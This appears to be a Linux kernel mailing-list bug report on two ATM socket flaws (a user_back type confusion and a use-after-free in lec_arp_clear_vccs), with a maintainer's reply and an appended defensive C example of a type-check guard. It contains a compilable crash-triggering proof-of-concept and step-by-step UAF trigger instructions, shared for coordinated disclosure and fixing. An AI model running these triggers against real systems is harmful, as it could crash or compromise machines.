On Mon, Apr 27, 2020 at 6:16 AM Gengming Liu <l.dmxcsn...@gmail.com> wrote:
>
> We found two security bugs in the Linux kernel and here's the
> description of the bugs.
>
> 0. Build a testing environment
> a. Set up Ubuntu 19.04 in Vmware workstation.
> b. sudo apt install linux-image-5.0.0-21-generic.
> c. Change the grub default boot entry to 5.0.0-21-generic. (see
> https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order)
> cat /proc/version. If it is as follows, it means you succeeded.
>
> "Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019"
>
> d. Compile the poc by using gcc.
> e. Execute poc by "sudo ./poc"
> f. Use dmesg to check the kernel message about the crash.
>
> 1. atm_vcc_userback type confusion
>
> atm(AF_ATMSVC) socket's vcc->user_back can be treated as different
> types of structures.
>
> To trigger this bug it requires CAP_NET_ADMIN. (Use sudo ./poc)
>
> The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
> Proc version is:
> Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019
>
> Poc:
> #include <sys/socket.h>   /* socket(), setsockopt() */
> #include <sys/ioctl.h>    /* ioctl() */
> #include <linux/socket.h>
> #include <linux/atmdev.h>
> #include <linux/atmarp.h>
> #include <linux/atmlec.h>
> #include <linux/atmsvc.h>
> #include <linux/atmmpc.h>
> #include <linux/atmclip.h>
>
> int main(int argc, char const *argv[])
> {
>         int fd;
>
>         fd = socket(0x14, 3, 0);               /* AF_ATMSVC, SOCK_RAW */
>         ioctl(fd, 0x61d8, 0x17);                /* ATMMPC_CTRL */
>
>         unsigned long long arg = 1;
>         ioctl(fd, 0x400261f2, &arg);            /* ATM_SETBACKEND */
>         ioctl(fd, 0x61e2, 1);                   /* ATMARP_MKIP */
>
>         char buffer[] =
>                 "\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
>         setsockopt(fd, 0xe0c7, 0x80, buffer, 0x16);

What is this setsockopt() for? I don't connect it to user_back.
The ATM code checks for user_back before using, for example,

        if (cmd != ATM_SETBACKEND && atmvcc->push != pppoatm_push)
                return -ENOIOCTLCMD;

>
>         return 0;
> }
>
> 2. use-after-free in lec_arp_clear_vccs.
>
> UAF object: struct atm_vcc *vcc
>
> vcc is an atm(AF_ATMSVC) socket.
>
> To trigger this bug:
>
> 1. Create vcc socket #A and #B
> 2. ioctl(ATMLEC_CTRL) to attach #A to lec device.
> 3. ioctl(ATMLEC_DATA) to attach #B to device's priv->lec_arp_empty_ones list
> 4. close socket #B
> 5. close vcc socket #A to call lec_arp_clear_vccs() to trigger UAF

Yeah, good catch. I have a fix for this, will send it out shortly.

Thanks for the report!
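The reply above points at the defensive pattern that keeps a shared, untyped back-pointer like vcc->user_back from being misinterpreted: before casting it, compare a second field (the push handler) that identifies which back-end owns the object, as in the quoted `atmvcc->push != pppoatm_push` check. The user-space C below is an added illustration of that pattern and is not code from the report, the reply, or the kernel; `struct vcc`, `backend_a`, `backend_b`, `push_a`, `push_b` and the accessor names are stand-ins chosen for the example, not the kernel's definitions.

```c
/*
 * Added example: one void * back-pointer (user_back) shared by several
 * back-ends, with the push handler doubling as the type discriminator.
 * All names here are assumptions made for this illustration.
 */
#include <stddef.h>
#include <stdio.h>

struct vcc;

/* Two back-ends that each hang their own private state off user_back. */
struct backend_a { int magic; const char *name; };
struct backend_b { long counter; void (*cb)(void); };

struct vcc {
    void (*push)(struct vcc *);   /* per-back-end handler; identifies the owner */
    void *user_back;              /* untyped: its real type is implied by push */
};

void push_a(struct vcc *v) { (void)v; }
void push_b(struct vcc *v) { (void)v; }

/* Unsafe: casts blindly, so a vcc attached to back-end B is read as if it
 * carried back-end A's structure (the type confusion the report describes). */
struct backend_a *get_a_unchecked(struct vcc *v)
{
    return (struct backend_a *)v->user_back;
}

/* Safe: refuse the cast unless the push handler says this vcc belongs to A,
 * mirroring the kernel's "push != expected_push -> bail out" check. */
struct backend_a *get_a_checked(struct vcc *v)
{
    if (v->push != push_a)
        return NULL;
    return (struct backend_a *)v->user_back;
}

/* Attach helpers set both fields together so they can never disagree. */
void attach_a(struct vcc *v, struct backend_a *a)
{
    v->push = push_a;
    v->user_back = a;
}

void attach_b(struct vcc *v, struct backend_b *b)
{
    v->push = push_b;
    v->user_back = b;
}

/* Returns 1 when the checked accessor refuses a vcc owned by back-end B
 * while the unchecked accessor hands back a misinterpreted pointer. */
int mismatch_is_caught(void)
{
    struct backend_b b = { .counter = 0x41424344L, .cb = NULL };
    struct vcc v;
    attach_b(&v, &b);
    struct backend_a *wrong = get_a_unchecked(&v);  /* non-NULL, wrong type */
    struct backend_a *right = get_a_checked(&v);    /* NULL: cast refused */
    return (wrong != NULL && right == NULL) ? 1 : 0;
}

/* Returns 1 when the checked accessor still works for a correctly attached
 * back-end A object, i.e. the guard does not break the legitimate path. */
int matching_is_accepted(void)
{
    struct backend_a a = { .magic = 0xa, .name = "arp" };
    struct vcc v;
    attach_a(&v, &a);
    struct backend_a *got = get_a_checked(&v);
    return (got == &a && got->magic == 0xa) ? 1 : 0;
}

int main(void)
{
    printf("mismatched back-end refused: %d\n", mismatch_is_caught());
    printf("matching back-end accepted:  %d\n", matching_is_accepted());
    return 0;
}
```

The point of the model is that user_back alone carries no type information; whichever field is set alongside it (here the push handler) is the only thing the reader can check, so every ioctl or setsockopt path that casts user_back needs that comparison before the cast, and the attach path must write both fields as a unit.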